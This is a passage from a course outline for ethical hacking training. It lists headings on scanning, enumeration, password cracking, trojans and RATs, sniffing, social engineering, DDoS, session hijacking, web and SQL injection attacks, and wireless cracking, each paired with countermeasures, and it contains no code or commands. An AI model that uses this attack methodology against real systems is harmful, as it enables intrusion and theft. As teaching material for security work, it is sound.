        • Banner Grabbing Countermeasures
          • Disabling or Changing Banner
          • Hiding File Extensions from Web Pages
        • Scan for Vulnerability
          • Vulnerability Scanning
          • Vulnerability Scanning Tool
            • Nessus
            • GAFI LanGuard
            • Qualys FreeScan
          • Network Vulnerability Scanners
          • Vulnerability Scanning Tools for Mobile
        • Draw Network Diagrams
          • Drawing Network Diagrams
          • Network Discovery Tool
            • Network Topology Mapper
            • OpManager and NetworkView
          • Network Discovery and  Mapping Tools
          • Network Discovery Tools for Mobile
        • Prepare Proxies
          • Proxy Servers
          • Proxy Chaining
          • Proxy Tool
            • Proxy Switcher
            • Proxy Workbench
            • TOR and CyberGhost
          • Proxy Tools
          • Proxy Tools for Mobile
          • Free Proxy Servers
          • Introduction to Anonymizers
            • Censorship Circumvention Tool: Tails
            • G-Zapper
            • Anonymizers
            • Anonymizers for Mobile
          • Spoofing IP Address
          • IP Spoofing Detection Techniques
            • Direct TTL Probes
            • IP Identification Number
          • TCP Flow Control Method
          • IP Spoofing Countermeasures
        • Scanning Pen Testing

 

Enumeration

  • Enumeration Concepts
    • What is Enumeration?
    • Techniques for Enumeration
    • Services and Ports to Enumerate
  • NetBIOS Enumeration
    • NetBIOS Enumeration Tool
      • SuperScan
      • Hyena
      • Winfingerprint
      • NetBIOS Enumerator and Nsauditor Network Security Auditor
    • Enumerating User Accounts
    • Enumerating Shared Resources Using Net View
  • SNMP Enumeration
    • Working of SNMP
    • Management Information Base (MIB)
    • SNMP Enumeration Tool
      • OpUtils
      • Engineer’s Toolset
    • SNMP Enumeration Tools
  • LDAP Enumeration
    • LDAP Enumeration Tool: Softerra LDAP Administrator
    • LDAP Enumeration Tools
  • NTP Enumeration
    • NTP Enumeration Commands
    • NTP Enumeration Tools
  • SMTP Enumeration
    • SMTP Enumeration Tool: NetScanTools Pro
    • Telnet Enumeration
    • DNS Zone Transfer Enumeration Using NSLookup
  • Enumeration Countermeasures
  • SMB Enumeration Countermeasures
  • Enumeration Pen Testing

 

System Hacking

  • Information at Hand Before System Hacking Stage
  • System Hacking: Goals
  • CEH Hacking Methodology (CHM)
  • CEH System Hacking Steps
    • Cracking Passwords
      • Password Cracking
      • Types of Password Attacks
      • Non-Electronic Attacks
      • Active Online Attack
        • Dictionary, Brute Forcing and Rule-based Attack
        • Password Guessing
      • Default Passwords
      • Active Online Attack:
        • Trojan/Spyware/Keylogger
        • Example of Active Online Attack Using USB Drive
        • Hash Injection Attack
      • Passive Online Attack
        • Wire Sniffing
        • Man-in-the-Middle and Replay Attack
      • Offline Attack
        • Rainbow Attacks
          • Tools to Create Rainbow Tables: rtgen and Winrtgen
        • Distributed Network Attack
      • Elcomsoft Distributed Password Recovery
      • Microsoft Authentication
      • How Hash Passwords Are Stored in Windows SAM?
        • NTLM Authentication Process
        • Kerberos Authentication
      • Password Salting
      • pwdump7 and fgdump
      • Password Cracking Tools
        • L0phtCrack and Ophcrack
        • Cain & Abel and RainbowCrack
      • Password Cracking Tools
      • Password Cracking Tool for Mobile: FlexiSPY Password Grabber
      • How to Defend against Password Cracking
      • Implement and Enforce Strong Security Policy
      • CEH System Hacking Steps
    • Escalating Privileges
      • Privilege Escalation
      • Privilege Escalation Using DLL Hijacking
      • Privilege Escalation Tool: Active@ Password Changer
      • Privilege Escalation Tools
      • How to Defend Against Privilege Escalation
    • Executing Applications
      • RemoteExec
      • PDQ Deploy
      • DameWare Remote Support
      • Keylogger
        • Types of Keystroke Loggers
        • Hardware Keyloggers
        • Keylogger: All In One Keylogger
        • Keyloggers for Windows
        • Keylogger for Mac: Amac Keylogger for Mac
        • Keyloggers for MAC
      • Spyware
        • Spyware: Spytech SpyAgent
        • Spyware: Power Spy 2014
        • What Does the Spyware Do?
        • Spyware
        • USB Spyware: USBSpy
        • Audio Spyware: Spy Voice Recorder and Sound Snooper
        • Video Spyware: WebCam Recorder
        • Cellphone Spyware: Mobile Spy
        • Telephone/Cellphone Spyware
        • GPS Spyware: SPYPhone
        • GPS Spyware
      • How to Defend Against Keyloggers
        • Anti-Keylogger: Zemana AntiLogger
        • Anti-Keylogger
      • How to Defend Against Spyware
        • Anti-Spyware: SUPERAntiSpyware
        • Anti-Spyware
      • Hiding Files
        • Rootkits
          • Types of Rootkits
          • How Rootkit Works
          • Rootkit
            • Avatar
            • Necurs
            • Azazel
            • ZeroAccess
          • Detecting Rootkits
            • Steps for Detecting Rootkits
            • How to Defend against Rootkits
            • Anti-Rootkit: Stinger and UnHackMe
            • Anti-Rootkits
          • NTFS Data Stream
            • How to Create NTFS Streams
            • NTFS Stream Manipulation
            • How to Defend against NTFS Streams
            • NTFS Stream Detector: StreamArmor
            • NTFS Stream Detectors
          • What Is Steganography?
            • Classification of Steganography
            • Types of Steganography based on Cover Medium
              • Whitespace Steganography Tool: SNOW
              • Image Steganography
              • Least Significant Bit Insertion
              • Masking and Filtering
              • Algorithms and Transformation
              • Image Steganography: QuickStego
              • Image Steganography Tools
              • Document Steganography: wbStego
              • Document Steganography Tools
              • Video Steganography
              • Video Steganography: OmniHide PRO and Masker
              • Video Steganography Tools
              • Audio Steganography
              • Audio Steganography: DeepSound
              • Audio Steganography Tools
              • Folder Steganography: Invisible Secrets 4
              • Folder Steganography Tools
              • Spam/Email Steganography: Spam Mimic
            • Steganography Tools for Mobile Phones
          • Steganalysis
            • Steganalysis Methods/Attacks on Steganography
            • Detecting Text and Image Steganography
            • Detecting Audio and Video Steganography
            • Steganography Detection Tool: Gargoyle Investigator™ Forensic Pro
            • Steganography Detection Tools
          • Covering Tracks
            • Covering Tracks
            • Disabling Auditing: Auditpol
            • Clearing Logs
            • Manually Clearing Event Logs
            • Ways to Clear Online Tracks
            • Covering Tracks Tool: CCleaner
            • Covering Tracks Tool: MRU-Blaster
            • Track Covering Tools
          • Penetration Testing
            • Password Cracking
            • Privilege Escalation
            • Executing Applications
            • Hiding Files
            • Covering Tracks

 

Malware Threats

  • Introduction to Malware
    • Different Ways a Malware can Get into a System
    • Common Techniques Attackers Use to Distribute Malware on the Web
  • Trojan Concepts
    • Financial Loss Due to Trojans
    • What is a Trojan?
    • How Hackers Use Trojans
    • Common Ports used by Trojans
    • How to Infect Systems Using a Trojan
    • Wrappers
    • Dark Horse Trojan Virus Maker
    • Trojan Horse Construction Kit
    • Crypters: AIO FUD Crypter, Hidden Sight Crypter, and Galaxy Crypter
    • Crypters: Criogenic Crypter, Heaven Crypter, and SwayzCryptor
    • How Attackers Deploy a Trojan
      • Exploit Kit
      • Exploit Kit: Infinity
      • Exploit Kits: Phoenix Exploit Kit and Blackhole Exploit Kit
      • Exploit Kits: Bleedinglife and Crimepack
    • Evading Anti-Virus Techniques
  • Types of Trojans
    • Command Shell Trojans
    • Defacement Trojans
    • Defacement Trojans: Restorator
    • Botnet Trojans
      • Tor-based Botnet Trojans: ChewBacca
      • Botnet Trojans: Skynet and CyberGate
    • Proxy Server Trojans
      • Proxy Server Trojan: W3bPrOxy Tr0j4nCr34t0r (Funny Name)
    • FTP Trojans
    • VNC Trojans
      • VNC Trojans: WinVNC and VNC Stealer
    • HTTP/HTTPS Trojans
      • HTTP Trojan: HTTP RAT
    • Shttpd Trojan – HTTPS (SSL)
    • ICMP Tunneling
    • Remote Access Trojans
      • Optix Pro and MoSucker
      • BlackHole RAT and SSH – R.A.T
      • njRAT and Xtreme RAT
      • SpyGate – RAT and Punisher RAT
      • DarkComet RAT, Pandora RAT, and HellSpy RAT
      • ProRat and Theef
      • Hell Raiser
      • Atelier Web Remote Commander
    • Covert Channel Trojan: CCTT
    • E-banking Trojans
      • Working of E-banking Trojans
      • E-banking Trojan
        • ZeuS and SpyEye
        • Citadel Builder and Ice IX
      • Destructive Trojans: M4sT3r Trojan
      • Notification Trojans
      • Data Hiding Trojans (Encrypted Trojans)
    • Virus and Worms Concepts
      • Introduction to Viruses
      • Stages of  Virus Life
      • Working of  Viruses:
        • Infection Phase
        • Attack Phase
      • Why Do People Create Computer Viruses
      • Indications of Virus Attack
      • Virus Hoaxes and Fake Antiviruses
      • Ransomware
      • Types of Viruses
        • System or Boot Sector Viruses
        • File and Multipartite Viruses
        • Macro Viruses
        • Cluster Viruses
        • Stealth/Tunneling Viruses
        • Encryption Viruses
        • Polymorphic Code
        • Metamorphic Viruses
        • File Overwriting or Cavity Viruses
        • Sparse Infector Viruses
        • Companion/Camouflage Viruses
        • Shell Viruses
        • File Extension Viruses
        • Add-on and Intrusive Viruses
        • Transient and Terminate and Stay Resident Viruses
      • Writing a Simple Virus Program
        • Sam’s Virus Generator and JPS Virus Maker
        • Andreinick05’s Batch Virus Maker and DeadLine’s Virus Maker
        • Sonic Bat – Batch File Virus Creator and Poison Virus Maker
      • Computer Worms
        • How Is a Worm Different from a Virus?
        • Computer Worms: Ghost Eye Worm
        • Worm Maker: Internet Worm Maker Thing
      • Malware Reverse Engineering
        • What is Sheep Dip Computer?
        • Anti-Virus Sensor Systems
        • Malware Analysis Procedure: Preparing Testbed
        • Malware Analysis Procedure
        • Malware Analysis Tool: IDA Pro
        • Online Malware Testing: VirusTotal
        • Online Malware Analysis Services
        • Trojan Analysis: Neverquest
        • Virus Analysis: Ransom Cryptolocker
        • Worm Analysis: Darlloz (Internet of Things (IoT) Worm)
      • Malware Detection
        • How to Detect Trojans
          • Scanning for Suspicious Ports
            • Tools: TCPView and CurrPorts
          • Scanning for Suspicious Processes
            • Process Monitoring Tool: What’s Running
            • Process Monitoring Tools
          • Scanning for Suspicious Registry Entries
            • Registry Entry Monitoring Tool: RegScanner
            • Registry Entry Monitoring Tools
          • Scanning for Suspicious Device Drivers
            • Device Drivers Monitoring Tool: DriverView
            • Device Drivers Monitoring Tools
          • Scanning for Suspicious Windows Services
            • Windows Services Monitoring Tool: Windows Service Manager (SrvMan)
            • Windows Services Monitoring Tools
          • Scanning for Suspicious Startup Programs
            • Windows 8 Startup Registry Entries
            • Startup Programs Monitoring Tool: Security AutoRun
            • Startup Programs Monitoring Tools
          • Scanning for Suspicious Files and Folders
            • Files and Folder Integrity Checker: FastSum and WinMD5
            • Files and Folder Integrity Checker
          • Scanning for Suspicious Network Activities
          • Detecting Trojans and Worms with Capsa Network Analyzer
        • Virus Detection Methods
      • Countermeasures
        • Trojan Countermeasures
        • Backdoor Countermeasures
        • Virus and Worms Countermeasures
      • Anti-Malware Software
        • Anti-Trojan Software
          • TrojanHunter
          • Emsisoft Anti-Malware
        • Anti-Trojan Software
        • Companion Antivirus: Immunet
        • Anti-virus Tools
      • Penetration Testing
        • Pen Testing for Trojans and Backdoors
        • Penetration Testing for Virus

 

Sniffing

  • Sniffing Concepts
    • Network Sniffing and Threats
    • How a Sniffer Works
    • Types of Sniffing
      • Passive Sniffing
      • Active Sniffing
    • How an Attacker Hacks the Network Using Sniffers
    • Protocols Vulnerable to Sniffing
    • Sniffing in the Data Link Layer of the OSI Model
    • Hardware Protocol Analyzer
    • Hardware Protocol Analyzers
    • SPAN Port
    • Wiretapping
    • Lawful Interception
    • Wiretapping Case Study: PRISM
  • MAC Attacks
    • MAC Address/CAM Table
    • How CAM Works
    • What Happens When CAM Table Is Full?
    • MAC Flooding
    • Mac Flooding Switches with macof
    • Switch Port Stealing
    • How to Defend against MAC Attacks
  • DHCP Attacks
    • How DHCP Works
    • DHCP Request/Reply Messages
    • IPv4 DHCP Packet Format
    • DHCP Starvation Attack
    • DHCP Starvation Attack Tools
    • Rogue DHCP Server Attack
    • How to Defend Against DHCP Starvation and Rogue Server Attack
  • ARP   Poisoning
    • What Is Address Resolution Protocol (ARP)?
    • ARP Spoofing Attack
    • How Does ARP Spoofing Work
    • Threats of ARP Poisoning
    • ARP Poisoning Tool
      • Cain & Abel and WinArpAttacker
      • Ufasoft Snif
    • How to Defend Against ARP Poisoning
    • Configuring DHCP Snooping and Dynamic ARP Inspection on Cisco Switches
    • ARP Spoofing Detection: XArp
  • Spoofing Attack
    • MAC Spoofing/Duplicating
    • MAC Spoofing Technique: Windows
    • MAC Spoofing Tool: SMAC
    • IRDP Spoofing
    • How to Defend Against MAC Spoofing
  • DNS Poisoning
    • DNS Poisoning Techniques
    • Intranet DNS Spoofing
    • Internet DNS Spoofing
    • Proxy Server DNS Poisoning
    • DNS Cache Poisoning
    • How to Defend Against DNS Spoofing
  • Sniffing Tools
  • Sniffing Tool: Wireshark
  • Follow TCP Stream in Wireshark
  • Display Filters in Wireshark
  • Additional Wireshark Filters
  • Sniffing Tool
    • SteelCentral Packet Analyzer
    • Tcpdump/Windump
  • Packet Sniffing Tool: Capsa Network Analyzer
  • Network Packet Analyzer
    • OmniPeek Network Analyzer
    • Observer
    • Sniff-O-Matic
  • TCP/IP Packet Crafter: Colasoft Packet Builder
  • Network Packet Analyzer: RSA NetWitness Investigator
  • Additional Sniffing Tools
  • Packet Sniffing Tools for Mobile: Wi.cap. Network Sniffer Pro and FaceNiff
  • Counter measures
    • How to Defend Against Sniffing
  • Sniffing Detection Techniques
    • How to Detect Sniffing
    • Sniffer Detection Technique
      • Ping Method
      • ARP Method
      • DNS Method
    • Promiscuous Detection Tool
      • PromqryUI
      • Nmap
    • Sniffing Pen Testing

 

 

Social Engineering

  • Social Engineering Concepts
    • What is Social Engineering?
    • Behaviors Vulnerable to Attacks
    • Factors that Make Companies Vulnerable to Attacks
    • Why Is Social Engineering Effective?
    • Warning Signs of an Attack
    • Phases in a Social Engineering Attack
  • Social Engineering Techniques
    • Types of Social Engineering
      • Human-based Social Engineering
      • Impersonation
        • Impersonation Scenario
          • Over-Helpfulness of Help Desk
          • Third-party Authorization
          • Tech Support
          • Internal Employee/Client/Vendor
          • Repairman
          • Trusted Authority Figure
        • Eavesdropping and Shoulder Surfing
        • Dumpster Diving
        • Reverse Social Engineering, Piggybacking, and Tailgating
      • Watch these Movies
      • Watch this Movie
      • Computer-based Social Engineering
        • Phishing
        • Spear Phishing
      • Mobile-based Social Engineering
        • Publishing Malicious Apps
        • Repackaging Legitimate Apps
        • Fake Security Applications
        • Using SMS
      • Insider Attack
      • Disgruntled Employee
      • Preventing Insider Threats
      • Common Social Engineering Targets and Defense Strategies
    • Impersonation on Social Networking Sites
      • Social Engineering Through Impersonation on Social Networking Sites
      • Social Engineering on Facebook
      • Social Engineering on LinkedIn and Twitter
      • Risks of Social Networking to Corporate Networks
    • Identity Theft
      • Identity Theft Statistics
      • Identify Theft
      • How to Steal an Identity
        • STEP 1
        • STEP 2
        • Comparison
        • STEP 3
      • Real Steven Gets Huge Credit Card Statement
      • Identity Theft – Serious Problem
    • Social Engineering Countermeasures
      • How to Detect Phishing Emails
      • Anti-Phishing Toolbar
        • Netcraft
        • PhishTank
      • Identity Theft Countermeasures
    • Penetration Testing
      • Social Engineering Pen Testing
        • Using Emails
        • Using Phone
        • In Person
        • Social Engineering Toolkit (SET)

 

Denial-of-Service    

  • DoS/DDoS Concepts
    • DDoS Attack Trends
    • What is a Denial of Service Attack?
    • What Are Distributed Denial of Service Attacks?
    • How Distributed Denial of Service Attacks Work
  • DoS/DDoS Attack Techniques
    • Basic Categories of DoS/DDoS Attack Vectors
    • DoS/DDoS Attack Techniques
      • Bandwidth Attacks
      • Service Request Floods
      • SYN Attack
      • SYN Flooding
      • ICMP Flood Attack
      • Peer-to-Peer Attacks
      • Permanent Denial-of-Service Attack
      • Application Level Flood Attacks
      • Distributed Reflection Denial of Service (DRDoS)
    • Botnets
      • Organized Cyber Crime: Organizational Chart
      • Botnet
      • A Typical Botnet Setup
      • Botnet Ecosystem
      • Scanning Methods for Finding Vulnerable Machines
      • How Malicious Code Propagates?
      • Botnet Trojan
        • Blackshades NET
        • Cythosia Botnet and Andromeda Bot
        • PlugBot
      • DDoS Case Study
        • DDoS Attack
        • Hackers Advertise Links to Download Botnet
      • DoS/DDoS Attack Tools
        • Pandora DDoS Bot Toolkit
        • Dereil and HOIC
        • DoS HTTP and BanglaDos
        • DoS and DDoS Attack Tools
        • DoS and DDoS Attack Tool for Mobile
          • AnDOSid
          • Low Orbit Ion Cannon (LOIC)
        • Counter-measures
          • Detection Techniques
          • Activity Profiling
          • Wavelet Analysis
          • Sequential Change-Point Detection
          • DoS/DDoS Countermeasure Strategies
          • DDoS Attack Countermeasures
            • Protect Secondary Victims
            • Detect and Neutralize Handlers
            • Detect Potential Attacks
            • Deflect Attacks
            • Mitigate Attacks
          • Post-Attack Forensics
          • Techniques to Defend against Botnets
          • DoS/DDoS Countermeasures
          • DoS/DDoS Protection at ISP Level
          • Enabling  TCP Intercept on Cisco IOS Software
          • Advanced DDoS Protection Appliances
        • DoS/DDoS Protection Tools
          • DoS/DDoS Protection Tool: FortGuard Anti-DDoS Firewall 2014
          • DoS/DDoS Protection Tools
        • DoS/DDoS Attack Penetration Testing

 

Session Hijacking

  • Session Hijacking Concepts
    • What is Session Hijacking?
    • Why Session Hijacking is Successful?
    • Session Hijacking Process
    • Packet Analysis of a Local Session Hijack
    • Types of Session Hijacking
    • Session Hijacking in OSI Model
    • Spoofing vs. Hijacking
  • Application Level Session Hijacking
    • Compromising Session IDs using Sniffing
    • Compromising Session IDs by Predicting Session Token
    • How to Predict a Session Token
    • Compromising Session IDs Using Man-in-the-Middle Attack
    • Compromising Session IDs Using Man-in-the-Browser Attack
    • Steps to Perform Man-in-the-Browser Attack
    • Compromising Session IDs Using Client-side Attacks
    • Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack
    • Compromising Session IDs Using Client-side Attacks: Cross-site Request Forgery Attack
    • Compromising Session IDs Using Session Replay Attack
    • Compromising Session IDs Using Session Fixation
    • Session Fixation Attack
    • Session Hijacking Using Proxy Servers
  • Network-level Session Hijacking
    • The 3-Way Handshake
    • TCP/IP Hijacking
    • TCP/IP Hijacking Process
    • IP Spoofing: Source Routed Packets
    • RST Hijacking
    • Blind Hijacking
    • MiTM Attack Using Forged ICMP and ARP Spoofing
    • UDP Hijacking
  • Session Hijacking Tools
    • Session Hijacking Tool
      • Zaproxy
      • Burp Suite and Hijack
    • Session Hijacking Tools
    • Session Hijacking Tools for Mobile: DroidSheep and DroidSniff
  • Counter-measures
    • Session Hijacking Detection Methods
    • Protecting against Session Hijacking
    • Methods to Prevent Session Hijacking
      • To be Followed by Web Developers
      • To be Followed by Web Users
    • Approaches Vulnerable to Session Hijacking and their Preventative Solutions
    • IPSec
    • Modes of IPsec
    • IPsec Architecture
    • IPsec Authentication and Confidentiality
    • Components of IPsec
  • Session Hijacking Pen Testing

 

Hacking Webservers

  • Webserver Concepts
    • Web Server Security Issue
    • Why Web Servers Are Compromised
    • Impact of  Webserver Attacks
    • Open Source Webserver Architecture
    • IIS Webserver Architecture
  • Webserver Attacks
    • DoS/DDoS Attacks
    • DNS Server Hijacking
    • DNS Amplification Attack
    • Directory Traversal Attacks
    • Man-in-the-Middle/Sniffing Attack
    • Phishing Attacks
    • Website Defacement
      • Webserver Misconfiguration
    • Webserver Misconfiguration Example
    • HTTP Response Splitting Attack
    • Web Cache Poisoning Attack
    • SSH Bruteforce Attack
    • Webserver Password Cracking
      • Webserver Password Cracking Techniques
    • Web Application Attacks
  • Attack Methodology
    • Webserver Attack Methodology
      • Information Gathering
      • Information Gathering from Robots.txt File
      • Webserver Footprinting
    • Webserver Footprinting Tools
    • Enumerating Webserver Information Using Nmap
    • Webserver Attack Methodology
      • Mirroring a Website
      • Vulnerability Scanning
      • Session Hijacking
      • Hacking Web Passwords
    • Webserver Attack Tools
      • Metasploit
        • Metasploit Architecture
        • Metasploit Exploit Module
        • Metasploit Payload Module
        • Metasploit Auxiliary Module
        • Metasploit NOPS Module
      • Webserver Attack Tools: Wfetch
      • Web Password Cracking Tool: THC-Hydra and Brutus
    • Counter-measures
      • Place Web Servers in Separate Secure Server Security Segment on Network
      • Countermeasures
        • Patches and Updates
        • Protocols
        • Accounts
        • Files and Directories
      • Detecting Web Server Hacking Attempts
      • How to Defend Against Web Server Attacks
      • How to Defend against HTTP Response Splitting and Web Cache Poisoning
      • How to Defend against DNS Hijacking
    • Patch Management
      • Patches and Hotfixes
      • What Is Patch Management?
      • Identifying Appropriate Sources for Updates and Patches
      • Installation of a Patch
      • Implementation and Verification of a Security Patch or Upgrade
      • Patch Management Tool: Microsoft Baseline Security Analyzer (MBSA)
      • Patch Management Tools
    • Webserver  Security Tools
      • Web Application Security Scanner: Syhunt Dynamic and N-Stalker Web Application Security Scanner
      • Web Server Security Scanner: Wikto and Acunetix Web Vulnerability Scanner
      • Web Server Malware Infection Monitoring Tool
        • HackAlert
        • QualysGuard Malware Detection
      • Webserver Security Tools
    • Webserver  Pen Testing
      • Web Server Pen Testing Tool
        • CORE Impact® Pro
        • Immunity CANVAS
        • Arachni

 

 

Hacking Web Applications<

  • Web App Concepts
    • Introduction to Web Applications
    • How Web Applications Work?
    • Web Application Architecture
    • Web 2.0 Applications
    • Vulnerability Stack
  • Web App Threats
    • Unvalidated Input
    • Parameter/Form Tampering
    • Directory Traversal
    • Security Misconfiguration
    • Injection Flaws
    • SQL Injection Attacks
      • Command Injection Attacks
    • Command Injection Example
    • File Injection Attack
    • What is LDAP Injection?
      • How LDAP Injection Works?
    • Hidden Field Manipulation Attack
    • Cross-Site Scripting (XSS) Attacks
      • How XSS Attacks Work
      • Cross-Site Scripting Attack Scenario: Attack via Email
      • XSS Example: Attack via Email
      • XSS Example: Stealing Users’ Cookies
      • XSS Example: Sending an Unauthorized Request
      • XSS Attack in Blog Posting
      • XSS Attack in Comment Field
      • Websites Vulnerable to XSS Attack
    • Cross-Site Request Forgery (CSRF) Attack
      • How CSRF Attacks Work?
    • Web Application Denial-of-Service (DoS) Attack
    • Denial of Service (DoS) Examples
    • Buffer Overflow Attacks
    • Cookie/Session Poisoning
      • How Cookie Poisoning Works?
    • Session Fixation Attack
    • CAPTCHA Attacks
    • Insufficient Transport Layer Protection
    • Improper Error Handling
    • Insecure Cryptographic Storage
    • Broken Authentication and Session Management
    • Unvalidated Redirects and Forwards
    • Web Services Architecture
    • Web Services Attack
    • Web Services Footprinting Attack
    • Web Services XML Poisoning
  • Web App Hacking Methodology
    • Footprint Web Infrastructure
      • Server Discovery
      • Service Discovery
      • Server Identification/Banner Grabbing
        • Detecting Web App Firewalls and Proxies on Target Site
      • Hidden Content Discovery
      • Web Spidering Using Burp Suite
      • Web Crawling Using Mozenda Web Agent Builder
    • Attack Web Servers
      • Hacking Web Servers
      • Web Server Hacking Tool: WebInspect
    • Analyze Web Applications
      • Identify Entry Points for User Input
      • Identify Server-Side Technologies
      • Identify Server-Side Functionality
      • Map the Attack Surface
    • Attack Authentication Mechanism
      • Username Enumeration
      • Password Attacks
        • Password Functionality Exploits
        • Password Guessing
        • Brute-forcing
      • Session Attacks: Session ID Prediction/ Brute-forcing
      • Cookie Exploitation: Cookie Poisoning
    • Authorization Attack Schemes
      • Authorization Attack
      • HTTP Request Tampering
      • Authorization Attack: Cookie Parameter  Tampering
    • Attack Session Management Mechanism
      • Session Management Attack
      • Attacking Session Token Generation Mechanism
      • Attacking Session Tokens Handling Mechanism: Session Token Sniffing
    • Perform Injection Attacks
      • Injection Attacks/Input Validation Attacks
    • Attack Data Connectivity
      • Connection String Injection
      • Connection String Parameter Pollution (CSPP) Attacks
      • Connection Pool DoS
    • Attack Web App Client
    • Attack Web Services
      • Web Services Probing Attacks
      • Web Service Attacks
        • SOAP Injection
        • XML Injection
      • Web Services Parsing Attacks
      • Web Service Attack Tool: soapUI and XMLSpy
    • Web Application Hacking Tools
      • Web Application Hacking Tools
        • Burp Suite Professional
        • CookieDigger
        • WebScarab
      • Web Application Hacking Tools
    • Countermeasures
      • Encoding Schemes
      • How to Defend Against SQL Injection Attacks?
      • How to Defend Against Command Injection Flaws?
      • How to Defend Against XSS Attacks?
      • How to Defend Against DoS Attack?
      • How to Defend Against Web Services Attack?
      • Guidelines for Secure CAPTCHA Implementation
      • Web Application Countermeasures
      • How to Defend Against Web Application Attacks?
    • Security Tools
      • Web Application Security Tool
        • Acunetix Web Vulnerability Scanner
        • Watcher Web Security Tool
        • Netsparker
        • N-Stalker Web Application Security Scanner
        • VampireScan
      • Web Application Security Tools
      • Web Application Firewall
        • dotDefender
        • ServerDefender VP
      • Web Application Firewall
    • Web App Pen Testing
      • Web Application Pen Testing
        • Information Gathering
        • Configuration Management Testing
        • Authentication Testing
        • Session Management Testing
        • Authorization Testing
        • Data Validation Testing
        • Denial of Service Testing
        • Web Services Testing
        • AJAX Testing
      • Web Application Pen Testing Framework
        • Kali Linux
        • Metasploit
        • Browser Exploitation Framework (BeEF)
        • PowerSploit

 

 

SQL Injection

  • SQL Injection Concepts
    • What is SQL Injection?
    • Why Bother about SQL Injection?
    • How Web Applications Work?
    • SQL Injection and Server-side Technologies
    • Understanding HTTP Post Request
    • Example: Normal SQL Query
    • Understanding an SQL Injection Query
      • Code Analysis
    • Example of a Web App Vulnerable to SQL Injection
      • aspx
      • Attack Analysis
    • Example of SQL Injection
      • Updating Table
      • Adding New Records
      • Identifying the Table Name
      • Deleting a Table
    • Types of SQL Injection
      • Error Based SQL Injection
      • Union SQL Injection
      • Blind SQL Injection
      • No Error Messages Returned
      • Blind SQL Injection: WAITFOR DELAY (YES or NO Response)
      • Boolean Exploitation Technique
    • SQL Injection Methodology
      • Information Gathering and SQL Injection Vulnerability Detection
        • Information Gathering
        • Identifying Data Entry Paths
        • Extracting Information through Error Messages
        • Testing for SQL Injection
        • Additional Methods to Detect SQL Injection
        • SQL Injection Black Box Pen Testing
        • Source Code Review to Detect SQL Injection Vulnerabilities
      • Launch SQL Injection Attacks
        • Perform Union SQL Injection
        • Perform Error Based SQL Injection
        • Perform Error Based SQL Injection: Using Stored Procedure Injection
        • Bypass Website Logins Using SQL Injection
        • Perform Blind SQL Injection – Exploitation (MySQL)
        • Blind SQL Injection
          • Extract Database User
          • Extract Database Name
          • Extract Column Name
          • Extract Data from ROWS
        • Perform Double Blind SQL Injection – Classical Exploitation (MySQL)
          • Perform Blind SQL Injection Using Out of Band Exploitation Technique
        • Exploiting Second-Order SQL Injection
      • Advanced SQL Injection
        • Database, Table, and Column Enumeration
        • Advanced Enumeration
        • Features of Different DBMSs
        • Creating Database Accounts
        • Password Grabbing
        • Grabbing SQL Server Hashes
        • Extracting SQL Hashes (In a Single Statement)
        • Transfer Database to Attacker’s Machine
        • Interacting with the Operating System
        • Interacting with the File System
        • Network Reconnaissance Using SQL Injection
        • Network Reconnaissance Full Query
      • SQL Injection Tools
        • BSQLHacker
        • Marathon Tool
        • SQL Power Injector
        • Havij
        • SQL Injection Tools
        • SQL Injection Tool for Mobile
          • DroidSQLi
          • sqlmapchik
        • Evasion Techniques
          • Evading IDS
          • Types of Signature Evasion Techniques
          • Evasion Technique
            • Sophisticated Matches
            • Hex Encoding
            • Manipulating White Spaces
            • In-line Comment
            • Char Encoding
            • String Concatenation
            • Obfuscated Codes
          • Counter-measures
            • How to Defend Against SQL Injection Attacks?
            • How to Defend Against SQL Injection Attacks: Use Type-Safe SQL Parameters
            • How to Defend Against SQL Injection Attacks
            • SQL Injection Detection Tool
              • dotDefender
              • IBM Security AppScan
              • WebCruiser
            • Snort Rule to Detect SQL Injection Attacks
            • SQL Injection Detection Tools

 

Hacking Wireless Networks

  • Wireless Concepts
    • Wireless Terminologies
    • Wireless Networks
    • Wi-Fi Networks at Home and Public Places
    • Wireless Technology Statistics
    • Types of Wireless Networks
    • Wireless Standards
    • Service Set Identifier (SSID)
    • Wi-Fi Authentication Modes
    • Wi-Fi Authentication Process Using a Centralized Authentication Server
    • Wi-Fi Chalking
      • Wi-Fi Chalking Symbols
    • Types of Wireless Antenna
      • Parabolic Grid Antenna
    • Wireless Encryption
      • Types of Wireless Encryption
        • WEP Encryption
          • How WEP Works?
        • What is WPA?
          • How WPA Works?
          • Temporal Keys
        • What is WPA2?
          • How WPA2 Works?
        • WEP vs. WPA vs. WPA2
        • WEP Issues
        • Weak Initialization Vectors (IV)
        • How to Break WEP Encryption?
        • How to Break WPA Encryption?
        • How to Defend Against WPA Cracking?
      • Wireless Threats
        • Access Control Attacks
        • Integrity Attacks
        • Confidentiality Attacks
        • Availability Attacks
        • Authentication Attacks
        • Rogue Access Point Attack
        • Client Mis-association
        • Misconfigured Access Point Attack
        • Unauthorized Association
        • Ad Hoc Connection Attack
        • HoneySpot Access Point Attack
        • AP MAC Spoofing
        • Denial-of-Service Attack
        • Jamming Signal Attack
        • Wi-Fi Jamming Devices
      • Wireless Hacking Methodology
        • Wi-Fi Discovery
          • Footprint the Wireless Network
          • Find Wi-Fi Networks to Attack
          • Wi-Fi Discovery Tool
            • inSSIDer and NetSurveyor
            • Vistumbler and NetStumbler
          • Wi-Fi Discovery Tools
          • Mobile-based Wi-Fi Discovery Tool
        • GPS Mapping
          • GPS Mapping Tool
            • WIGLE
            • Skyhook
          • Wi-Fi Hotspot Finder
            • Wi-Fi Finder
            • WeFi
          • How to Discover Wi-Fi Network Using Wardriving?
        • Wireless Traffic Analysis
          • Wireless Cards and Chipsets
          • Wi-Fi USB Dongle: AirPcap
          • Wi-Fi Packet Sniffer
            • Wireshark with AirPcap
            • SteelCentral Packet Analyzer
            • OmniPeek Network Analyzer
            • CommView for Wi-Fi
          • What is Spectrum Analysis?
          • Wi-Fi Packet Sniffers
        • Launch Wireless Attacks
          • Aircrack-ng Suite
          • How to Reveal Hidden SSIDs
            • Fragmentation Attack
          • How to Launch MAC Spoofing Attack?
            • Denial of Service: Deauthentication and Disassociation Attacks
            • Man-in-the-Middle Attack
            • MITM Attack Using Aircrack-ng
            • Wireless ARP Poisoning Attack
            • Rogue Access Point
            • Evil Twin
              • How to Set Up a Fake Hotspot (Evil Twin)?
            • Crack  Wi-Fi Encryption
              • How to Crack WEP Using Aircrack
              • How to Crack WPA-PSK Using Aircrack
